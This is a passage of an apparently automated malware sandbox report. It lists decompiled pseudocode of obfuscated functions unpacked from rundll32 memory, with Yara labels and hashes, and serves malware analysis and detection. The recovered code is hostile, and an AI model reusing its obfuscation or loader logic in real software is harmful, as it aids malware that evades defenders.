                                                                      0x02000038
                                                                      0x0200003f
                                                                      0x02000046
                                                                      0x0200004d
                                                                      0x02000054
                                                                      0x0200005b
                                                                      0x0200005e
                                                                      0x02000062
                                                                      0x02000069
                                                                      0x02000070
                                                                      0x02000074
                                                                      0x0200007b
                                                                      0x02000082
                                                                      0x02000086
                                                                      0x0200008a
                                                                      0x02000091
                                                                      0x02000098
                                                                      0x0200009f
                                                                      0x020000a3
                                                                      0x020000a7
                                                                      0x020000ae
                                                                      0x020000b5
                                                                      0x020000b9
                                                                      0x020000bd
                                                                      0x020000c1
                                                                      0x020000c8
                                                                      0x020000cf
                                                                      0x020000d6
                                                                      0x020000dd
                                                                      0x020000e1
                                                                      0x020000e4
                                                                      0x020000eb
                                                                      0x020000f2
                                                                      0x020000f6
                                                                      0x020000fd
                                                                      0x02000108
                                                                      0x0200010b
                                                                      0x02000124
                                                                      0x02000137
                                                                      0x02000145
                                                                      0x0200015f
                                                                      0x02000174
                                                                      0x02000179
                                                                      0x02000183

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: )7$@L$F<$hNB7$jd&
                                                                      • API String ID: 1586166983-2568215416
                                                                      • Opcode ID: 22006df91b3913bc911f7c656553d31beda62e5a5497648d07f23e78c7d83ceb
                                                                      • Instruction ID: 2920f2ecb5f2d29d8b2b2fd38133ddaf8bd313a6662fc309de3f33fd842d164d
                                                                      • Opcode Fuzzy Hash: 22006df91b3913bc911f7c656553d31beda62e5a5497648d07f23e78c7d83ceb
                                                                      • Instruction Fuzzy Hash: 2E5110B1C0121EABDF49DFE0D94A4EEBBB1FF04308F208198D511B62A1D7B90A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023F52E, Relevance: 6.4, Strings: 5, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )7$@L$F<$hNB7$jd&
                                                                      • API String ID: 0-2568215416
                                                                      • Opcode ID: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
                                                                      • Instruction ID: f2d360ad16153a201f114358e8a18588ec1ef155b056c8ef092b57420198dba8
                                                                      • Opcode Fuzzy Hash: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
                                                                      • Instruction Fuzzy Hash: B3511FB1D0021EEBDF59DFE0D94A4EEBBB1FB04308F208198D411B62A1D7B94A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFF369, Relevance: 6.3, Strings: 5, Instructions: 79COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 64%
                                                                      			E01FFF369(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				signed int _t82;
				intOrPtr _t93;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x596980;
				_v16 = 0xc974;
				_t82 = 0xd;
				_t93 = _a4;
				_v16 = _v16 * 0x36;
				_v16 = _v16 ^ 0xaf6efdbb;
				_v16 = _v16 ^ 0xaf44ac5b;
				_v28 = 0x3fde;
				_v28 = _v28 + 0x4220;
				_v28 = _v28 ^ 0x00009a54;
				_v12 = 0x436a;
				_v12 = _v12 + 0x6671;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x000031a0;
				_v32 = 0x47a5;
				_v32 = _v32 + 0x143f;
				_v32 = _v32 ^ 0x0000673a;
				_v8 = 0x9f04;
				_v8 = _v8 >> 2;
				_v8 = _v8 + 0xffffba35;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x00009ed5;
				_v36 = 0x79e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000012a7;
				_v24 = 0x1d1a;
				_v24 = _v24 / _t82;
				_v24 = _v24 + 0xffff8b37;
				_v24 = _v24 ^ 0xfffff957;
				_v20 = 0x427c;
				_v20 = _v20 ^ 0xbd8b340b;
				_v20 = _v20 * 0x3e;
				_v20 = _v20 ^ 0xe7c6e2bc;
				_t76 =  *((intOrPtr*)(_t93 + 0x18))( *((intOrPtr*)(_t93 + 8)), 1, 0);
				_t99 = _t76;
				if(_t76 != 0) {
					_push(0x1ff1050);
					_push(_v12);
					_t78 = E0200CF31(_v16, _v28, _t99);
					_push(_v8);
					_t95 = _t78;
					_push( *((intOrPtr*)(_t93 + 8)));
					_t79 = E01FF3938(_t78, _v32);
					if(_t79 != 0) {
						 *_t79();
					}
					E02000D6D(_v36, _v24, _v20, _t95);
				}
				return 0;
			}


















                                                                      0x01fff36f
                                                                      0x01fff375
                                                                      0x01fff37c
                                                                      0x01fff38a
                                                                      0x01fff38b
                                                                      0x01fff38e
                                                                      0x01fff391
                                                                      0x01fff398
                                                                      0x01fff39f
                                                                      0x01fff3a6
                                                                      0x01fff3ad
                                                                      0x01fff3b4
                                                                      0x01fff3bb
                                                                      0x01fff3c2
                                                                      0x01fff3c6
                                                                      0x01fff3cd
                                                                      0x01fff3d4
                                                                      0x01fff3db
                                                                      0x01fff3e2
                                                                      0x01fff3e9
                                                                      0x01fff3ed
                                                                      0x01fff3f4
                                                                      0x01fff3f8
                                                                      0x01fff3ff
                                                                      0x01fff406
                                                                      0x01fff40a
                                                                      0x01fff411
                                                                      0x01fff41f
                                                                      0x01fff422
                                                                      0x01fff429
                                                                      0x01fff430
                                                                      0x01fff437
                                                                      0x01fff444
                                                                      0x01fff447
                                                                      0x01fff451
                                                                      0x01fff454
                                                                      0x01fff456
                                                                      0x01fff459
                                                                      0x01fff45e
                                                                      0x01fff467
                                                                      0x01fff46c
                                                                      0x01fff472
                                                                      0x01fff474
                                                                      0x01fff479
                                                                      0x01fff483
                                                                      0x01fff485
                                                                      0x01fff485
                                                                      0x01fff491
                                                                      0x01fff498
                                                                      0x01fff49f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$:g$qf$|B$y
                                                                      • API String ID: 0-887352362
                                                                      • Opcode ID: d3426b5b804950b95c71475040bf1b6f6b44bbab9cf34ffc18f294c90bbd528d
                                                                      • Instruction ID: 1eda526a54c82d96170707c00a0cd97c6feea398802b975fb577529a61723bb8
                                                                      • Opcode Fuzzy Hash: d3426b5b804950b95c71475040bf1b6f6b44bbab9cf34ffc18f294c90bbd528d
                                                                      • Instruction Fuzzy Hash: 513122B1E0130AABEF14DFA1C94A5EEBBB2FF54314F208149D510B62A0D7BA5B45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023E8DD, Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$:g$qf$|B$y
                                                                      • API String ID: 0-887352362
                                                                      • Opcode ID: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
                                                                      • Instruction ID: d6dc174d198889dfe868dca4a160ae7c1581ac4e49af573d4568e7a291df237c
                                                                      • Opcode Fuzzy Hash: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
                                                                      • Instruction Fuzzy Hash: 813133B1D0120AEBEF08DFA1C94A5EEBBB1FB54314F208149D510B62A0D7B95B55CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFD2DD, Relevance: 5.2, Strings: 4, Instructions: 197COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E01FFD2DD() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t206;
				void* _t210;
				void* _t217;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int* _t244;

				_t244 =  &_v1144;
				_v1056 = 0x1aa15c;
				_v1052 = 0x4d0cb0;
				_t217 = 0xcdcbb46;
				_v1048 = 0xec305;
				_t238 = 0;
				_v1044 = 0;
				_v1080 = 0xf4ee;
				_t239 = 0x37;
				_v1080 = _v1080 / _t239;
				_v1080 = _v1080 ^ 0x00001f1a;
				_v1136 = 0x65d1;
				_v1136 = _v1136 >> 7;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 | 0xb1d65351;
				_v1136 = _v1136 ^ 0xb1d66160;
				_v1092 = 0x9227;
				_v1092 = _v1092 ^ 0xf0d4d9ed;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x03c34d93;
				_v1064 = 0x7d06;
				_v1064 = _v1064 | 0x78b1f3a9;
				_v1064 = _v1064 ^ 0x78b19bbc;
				_v1076 = 0x3a45;
				_v1076 = _v1076 ^ 0x8b32e14f;
				_v1076 = _v1076 ^ 0x8b32a728;
				_v1084 = 0x40e7;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 ^ 0x000056c5;
				_v1140 = 0x14b6;
				_v1140 = _v1140 + 0x82db;
				_v1140 = _v1140 + 0xffff6955;
				_v1140 = _v1140 | 0xc7e9aa62;
				_v1140 = _v1140 ^ 0xc7e9d185;
				_v1068 = 0xe08d;
				_v1068 = _v1068 ^ 0x0cc611ab;
				_v1068 = _v1068 ^ 0x0cc6d2cf;
				_v1108 = 0x428e;
				_v1108 = _v1108 ^ 0x2aea69d2;
				_v1108 = _v1108 * 0x68;
				_v1108 = _v1108 ^ 0x6f218659;
				_v1100 = 0x24cb;
				_v1100 = _v1100 ^ 0x57e30eba;
				_v1100 = _v1100 << 0xe;
				_v1100 = _v1100 ^ 0xca9c0614;
				_v1116 = 0x3dd7;
				_v1116 = _v1116 + 0x57d7;
				_v1116 = _v1116 * 0x14;
				_v1116 = _v1116 ^ 0x000bfaaf;
				_v1104 = 0x5f98;
				_v1104 = _v1104 | 0xb14dd167;
				_v1104 = _v1104 ^ 0x023b643c;
				_v1104 = _v1104 ^ 0xb376dba6;
				_v1144 = 0x61d9;
				_v1144 = _v1144 + 0x900;
				_v1144 = _v1144 + 0x298f;
				_v1144 = _v1144 + 0x5e62;
				_v1144 = _v1144 ^ 0x0000cef3;
				_v1132 = 0xb8f7;
				_v1132 = _v1132 >> 0xa;
				_v1132 = _v1132 << 0xc;
				_v1132 = _v1132 | 0x7a068a91;
				_v1132 = _v1132 ^ 0x7a06e880;
				_v1060 = 0xb6ca;
				_v1060 = _v1060 | 0x34ba312c;
				_v1060 = _v1060 ^ 0x34bab1b7;
				_v1112 = 0x7535;
				_v1112 = _v1112 ^ 0xf4f555d1;
				_v1112 = _v1112 + 0x341f;
				_v1112 = _v1112 ^ 0xf4f507bd;
				_v1120 = 0xf80;
				_v1120 = _v1120 + 0xd656;
				_v1120 = _v1120 ^ 0x1fb6d00a;
				_v1120 = _v1120 ^ 0x1fb65e63;
				_v1128 = 0xca3d;
				_t240 = 0x4b;
				_v1128 = _v1128 * 0xa;
				_v1128 = _v1128 << 1;
				_v1128 = _v1128 << 9;
				_v1128 = _v1128 ^ 0x1f99ed7d;
				_v1088 = 0xf1f3;
				_v1088 = _v1088 + 0x83;
				_v1088 = _v1088 << 0xf;
				_v1088 = _v1088 ^ 0x793b4332;
				_v1072 = 0xc19e;
				_v1072 = _v1072 / _t240;
				_v1072 = _v1072 ^ 0x00000807;
				_v1096 = 0x5df5;
				_t241 = 0x65;
				_v1096 = _v1096 / _t241;
				_v1096 = _v1096 + 0xb24c;
				_v1096 = _v1096 ^ 0x0000928e;
				_v1124 = 0x49f0;
				_v1124 = _v1124 + 0x7719;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x0608131f;
				do {
					while(_t217 != 0xcdcbb46) {
						if(_t217 == 0xe5d9d0e) {
							_t206 = E0200CBE7( &_v520, _v1112, __eflags, _v1120, _v1128,  &_v1040);
							_t244 =  &(_t244[3]);
							__eflags = _t206;
							_t238 =  !=  ? 1 : _t238;
							_t217 = 0x23d64a19;
							continue;
						} else {
							if(_t217 == 0xe97c3dd) {
								_push(_t217);
								E01FFDFD8(_v1080,  &_v520, __eflags, _v1136, _v1092);
								_t244 =  &(_t244[3]);
								_t217 = 0x3342c16f;
								continue;
							} else {
								if(_t217 == 0x23d64a19) {
									E020047B5(_v1088,  &_v1040, _v1072, _v1096, _v1124);
								} else {
									_t251 = _t217 - 0x3342c16f;
									if(_t217 != 0x3342c16f) {
										goto L10;
									} else {
										_push(0x1ff12d8);
										_push(_v1140);
										_push(_v1084);
										_t210 = E01FF5DFC(_v1064, _v1076, _t251);
										_t175 =  &_v1116; // 0x793b4332
										E01FFA4D7(_t251, _v1108, _v1100,  *_t175, _v1104, _t210,  *0x2011088 + 0x254,  &_v1040,  *0x2011088 + 0x38);
										E02000D6D(_v1144, _v1132, _v1060, _t210);
										_t244 =  &(_t244[0xd]);
										_t217 = 0xe5d9d0e;
										continue;
									}
								}
							}
						}
						L13:
						return _t238;
					}
					_t217 = 0xe97c3dd;
					L10:
					__eflags = _t217 - 0x1b50eba4;
				} while (__eflags != 0);
				goto L13;
			}







































                                                                      0x01ffd2dd
                                                                      0x01ffd2e3
                                                                      0x01ffd2ed
                                                                      0x01ffd2f5
                                                                      0x01ffd2fa
                                                                      0x01ffd306
                                                                      0x01ffd308
                                                                      0x01ffd30c
                                                                      0x01ffd31a
                                                                      0x01ffd31d
                                                                      0x01ffd321
                                                                      0x01ffd329
                                                                      0x01ffd331
                                                                      0x01ffd336
                                                                      0x01ffd33b
                                                                      0x01ffd343
                                                                      0x01ffd34b
                                                                      0x01ffd353
                                                                      0x01ffd35b
                                                                      0x01ffd360
                                                                      0x01ffd368
                                                                      0x01ffd370
                                                                      0x01ffd378
                                                                      0x01ffd380
                                                                      0x01ffd388
                                                                      0x01ffd390
                                                                      0x01ffd398
                                                                      0x01ffd3a0
                                                                      0x01ffd3a5
                                                                      0x01ffd3ad
                                                                      0x01ffd3b5
                                                                      0x01ffd3bd
                                                                      0x01ffd3c5
                                                                      0x01ffd3cd
                                                                      0x01ffd3d5
                                                                      0x01ffd3dd
                                                                      0x01ffd3e5
                                                                      0x01ffd3ed
                                                                      0x01ffd3f5
                                                                      0x01ffd402
                                                                      0x01ffd406
                                                                      0x01ffd40e
                                                                      0x01ffd416
                                                                      0x01ffd41e
                                                                      0x01ffd423
                                                                      0x01ffd42b
                                                                      0x01ffd433
                                                                      0x01ffd440
                                                                      0x01ffd444
                                                                      0x01ffd44c
                                                                      0x01ffd454
                                                                      0x01ffd45c
                                                                      0x01ffd464
                                                                      0x01ffd46c
                                                                      0x01ffd474
                                                                      0x01ffd47c
                                                                      0x01ffd484
                                                                      0x01ffd48c
                                                                      0x01ffd494
                                                                      0x01ffd49c
                                                                      0x01ffd4a1
                                                                      0x01ffd4a6
                                                                      0x01ffd4ae
                                                                      0x01ffd4b6
                                                                      0x01ffd4be
                                                                      0x01ffd4c6
                                                                      0x01ffd4ce
                                                                      0x01ffd4d6
                                                                      0x01ffd4de
                                                                      0x01ffd4e6
                                                                      0x01ffd4ee
                                                                      0x01ffd4f6
                                                                      0x01ffd4fe
                                                                      0x01ffd508
                                                                      0x01ffd515
                                                                      0x01ffd529
                                                                      0x01ffd52c
                                                                      0x01ffd530
                                                                      0x01ffd534
                                                                      0x01ffd539
                                                                      0x01ffd541
                                                                      0x01ffd549
                                                                      0x01ffd551
                                                                      0x01ffd556
                                                                      0x01ffd55e
                                                                      0x01ffd56e
                                                                      0x01ffd572
                                                                      0x01ffd57a
                                                                      0x01ffd586
                                                                      0x01ffd589
                                                                      0x01ffd58d
                                                                      0x01ffd595
                                                                      0x01ffd59d
                                                                      0x01ffd5a5
                                                                      0x01ffd5ad
                                                                      0x01ffd5b2
                                                                      0x01ffd5ba
                                                                      0x01ffd5ba
                                                                      0x01ffd5cc
                                                                      0x01ffd69d
                                                                      0x01ffd6a4
                                                                      0x01ffd6a8
                                                                      0x01ffd6aa
                                                                      0x01ffd6ad
                                                                      0x00000000
                                                                      0x01ffd5d2
                                                                      0x01ffd5d4
                                                                      0x01ffd662
                                                                      0x01ffd676
                                                                      0x01ffd67b
                                                                      0x01ffd67e
                                                                      0x00000000
                                                                      0x01ffd5da
                                                                      0x01ffd5e0
                                                                      0x01ffd6db
                                                                      0x01ffd5e6
                                                                      0x01ffd5e6
                                                                      0x01ffd5e8
                                                                      0x00000000
                                                                      0x01ffd5ee
                                                                      0x01ffd5ee
                                                                      0x01ffd5f3
                                                                      0x01ffd5f7
                                                                      0x01ffd603
                                                                      0x01ffd628
                                                                      0x01ffd63b
                                                                      0x01ffd650
                                                                      0x01ffd655
                                                                      0x01ffd658
                                                                      0x00000000
                                                                      0x01ffd658
                                                                      0x01ffd5e8
                                                                      0x01ffd5e0
                                                                      0x01ffd5d4
                                                                      0x01ffd6e3
                                                                      0x01ffd6ef
                                                                      0x01ffd6ef
                                                                      0x01ffd6b7
                                                                      0x01ffd6b9
                                                                      0x01ffd6b9
                                                                      0x01ffd6b9
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2C;y$5u$E:$b^
                                                                      • API String ID: 0-4114578400
                                                                      • Opcode ID: 52fae7da8ce1960d177ab42cb5ef1fe43ae5418987dd87cdf8f7e708ddbece43
                                                                      • Instruction ID: 0e5e095c6f1a0ff060e3b7a0f01f37f773481a0897619777a6fba73286be7017
                                                                      • Opcode Fuzzy Hash: 52fae7da8ce1960d177ab42cb5ef1fe43ae5418987dd87cdf8f7e708ddbece43
                                                                      • Instruction Fuzzy Hash: C4A11F715093819FE359CF62C58945BBBF1BFC5708F40891CF29A862A0D7BA8A09CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023C851, Relevance: 5.2, Strings: 4, Instructions: 197COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2C;y$5u$E:$b^
                                                                      • API String ID: 0-4114578400
                                                                      • Opcode ID: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
                                                                      • Instruction ID: 7d8dfcb8cebb2694e09ee481e1083e532fd13733ccaa54f8b8449ee1f16e1ca0
                                                                      • Opcode Fuzzy Hash: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
                                                                      • Instruction Fuzzy Hash: 7BA131B15093819FD358CF22C58A45BFBE1FBC5708F50891DF29A96260C7B98A18CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02001090, Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E02001090(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				void* _t140;
				void* _t158;
				intOrPtr* _t165;
				void* _t167;
				void* _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int* _t192;

				_t165 = _a4;
				_push(_a8);
				_t183 = __ecx;
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E02002550(_t140);
				_v8 = 0x6f9ade;
				_t184 = 0;
				_v4 = _v4 & 0;
				_t192 =  &(( &_v68)[4]);
				_v44 = 0x982a;
				_v44 = _v44 + 0xbc31;
				_t167 = 0x2bf8d881;
				_v44 = _v44 | 0xf90c86f7;
				_v44 = _v44 ^ 0xf90dd6fe;
				_v28 = 0x630d;
				_t185 = 0x43;
				_v28 = _v28 * 0x4e;
				_v28 = _v28 ^ 0x001e2df7;
				_v56 = 0x19d0;
				_v56 = _v56 * 0x38;
				_v56 = _v56 + 0x1bd7;
				_v56 = _v56 ^ 0x4b810ed7;
				_v56 = _v56 ^ 0x4b84d952;
				_v32 = 0xc9e1;
				_v32 = _v32 + 0xabf9;
				_v32 = _v32 ^ 0x000119f3;
				_v36 = 0x329d;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x00004114;
				_v60 = 0xf614;
				_v60 = _v60 / _t185;
				_t186 = 0x78;
				_v60 = _v60 * 0x44;
				_v60 = _v60 + 0xe907;
				_v60 = _v60 ^ 0x0001d7a4;
				_v48 = 0xee3;
				_v48 = _v48 * 0x48;
				_v48 = _v48 ^ 0xc9a4a55a;
				_v48 = _v48 ^ 0xc9a0a1d8;
				_v64 = 0x7fce;
				_v64 = _v64 / _t186;
				_t187 = 0x11;
				_v64 = _v64 / _t187;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000063f0;
				_v68 = 0xa533;
				_t188 = 0x65;
				_v68 = _v68 / _t188;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 * 0x3c;
				_v68 = _v68 ^ 0x000027f2;
				_v16 = 0x6517;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x00262f84;
				_v20 = 0xf07;
				_v20 = _v20 + 0xffffaba9;
				_v20 = _v20 ^ 0xffffe5ca;
				_v24 = 0x4d0a;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x1342cb05;
				_v40 = 0xdf77;
				_v40 = _v40 >> 2;
				_v40 = _v40 + 0xffffea10;
				_v40 = _v40 ^ 0x0000626b;
				_v52 = 0xc020;
				_v52 = _v52 | 0x928f446b;
				_t189 = 0x74;
				_v52 = _v52 / _t189;
				_v52 = _v52 | 0x14dbb019;
				_v52 = _v52 ^ 0x15dbc5e6;
				do {
					while(_t167 != 0x94f4759) {
						if(_t167 == 0xc9fc140) {
							_push(_t167);
							_t184 = E01FF54FB(_v12);
							if(_t184 != 0) {
								_t167 = 0x38319c56;
								continue;
							}
						} else {
							if(_t167 == 0x2bf8d881) {
								_t167 = 0x94f4759;
								continue;
							} else {
								if(_t167 != 0x38319c56) {
									goto L13;
								} else {
									E01FF9C40( &_v12, _v16, _t183, _v20, _v24, _t167, _v28, _v40, _t184, _t167, _v52);
									 *_t165 = _v12;
								}
							}
						}
						L6:
						return _t184;
					}
					_t158 = E01FF9C40( &_v12, _v56, _t183, _v32, _v36, _t167, _v44, _v60, 0, _t167, _v48);
					_t192 =  &(_t192[0xa]);
					if(_t158 == 0) {
						_t167 = 0x2cce3dbc;
						goto L13;
					} else {
						_t167 = 0xc9fc140;
						continue;
					}
					goto L6;
					L13:
				} while (_t167 != 0x2cce3dbc);
				goto L6;
			}
































                                                                      0x02001094
                                                                      0x0200109b
                                                                      0x0200109f
                                                                      0x020010a1
                                                                      0x020010a2
                                                                      0x020010a3
                                                                      0x020010a4
                                                                      0x020010a9
                                                                      0x020010b1
                                                                      0x020010b3
                                                                      0x020010b7
                                                                      0x020010ba
                                                                      0x020010c4
                                                                      0x020010cc
                                                                      0x020010d1
                                                                      0x020010d9
                                                                      0x020010e1
                                                                      0x020010f0
                                                                      0x020010f3
                                                                      0x020010f7
                                                                      0x020010ff
                                                                      0x0200110c
                                                                      0x02001110
                                                                      0x02001118
                                                                      0x02001120
                                                                      0x02001128
                                                                      0x02001130
                                                                      0x02001138
                                                                      0x02001140
                                                                      0x02001148
                                                                      0x0200114c
                                                                      0x02001154
                                                                      0x02001164
                                                                      0x0200116d
                                                                      0x02001170
                                                                      0x02001174
                                                                      0x0200117c
                                                                      0x02001184
                                                                      0x02001191
                                                                      0x02001195
                                                                      0x0200119d
                                                                      0x020011a5
                                                                      0x020011b5
                                                                      0x020011bd
                                                                      0x020011c2
                                                                      0x020011c8
                                                                      0x020011cd
                                                                      0x020011d5
                                                                      0x020011e1
                                                                      0x020011e4
                                                                      0x020011e8
                                                                      0x020011f2
                                                                      0x020011f6
                                                                      0x020011fe
                                                                      0x0200120b
                                                                      0x0200120f
                                                                      0x02001219
                                                                      0x02001221
                                                                      0x02001229
                                                                      0x02001231
                                                                      0x02001239
                                                                      0x0200123e
                                                                      0x02001246
                                                                      0x0200124e
                                                                      0x02001253
                                                                      0x0200125b
                                                                      0x02001263
                                                                      0x0200126b
                                                                      0x02001279
                                                                      0x02001281
                                                                      0x02001285
                                                                      0x0200128d
                                                                      0x02001295
                                                                      0x02001295
                                                                      0x0200129f
                                                                      0x020012fd
                                                                      0x02001303
                                                                      0x02001308
                                                                      0x0200130a
                                                                      0x00000000
                                                                      0x0200130a
                                                                      0x020012a1
                                                                      0x020012a7
                                                                      0x020012ed
                                                                      0x00000000
                                                                      0x020012a9
                                                                      0x020012af
                                                                      0x00000000
                                                                      0x020012b5
                                                                      0x020012d5
                                                                      0x020012e1
                                                                      0x020012e1
                                                                      0x020012af
                                                                      0x020012a7
                                                                      0x020012e4
                                                                      0x020012ec
                                                                      0x020012ec
                                                                      0x02001332
                                                                      0x02001337
                                                                      0x0200133c
                                                                      0x02001348
                                                                      0x00000000
                                                                      0x0200133e
                                                                      0x0200133e
                                                                      0x00000000
                                                                      0x0200133e
                                                                      0x00000000
                                                                      0x0200134d
                                                                      0x0200134d
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M$c$YGO$kb
                                                                      • API String ID: 0-1506048532
                                                                      • Opcode ID: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
                                                                      • Instruction ID: 0e03f7ab5d63d89d42bf9b64e5d633d6ad3d288000d660696d1ea9a4612c0538
                                                                      • Opcode Fuzzy Hash: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
                                                                      • Instruction Fuzzy Hash: 0E7133711083419FE358CF69C88991FFBE1BBC9758F404A1DF189962A0D3BAC659CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFBE74, Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E01FFBE74(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t140;
				void* _t156;
				void* _t157;
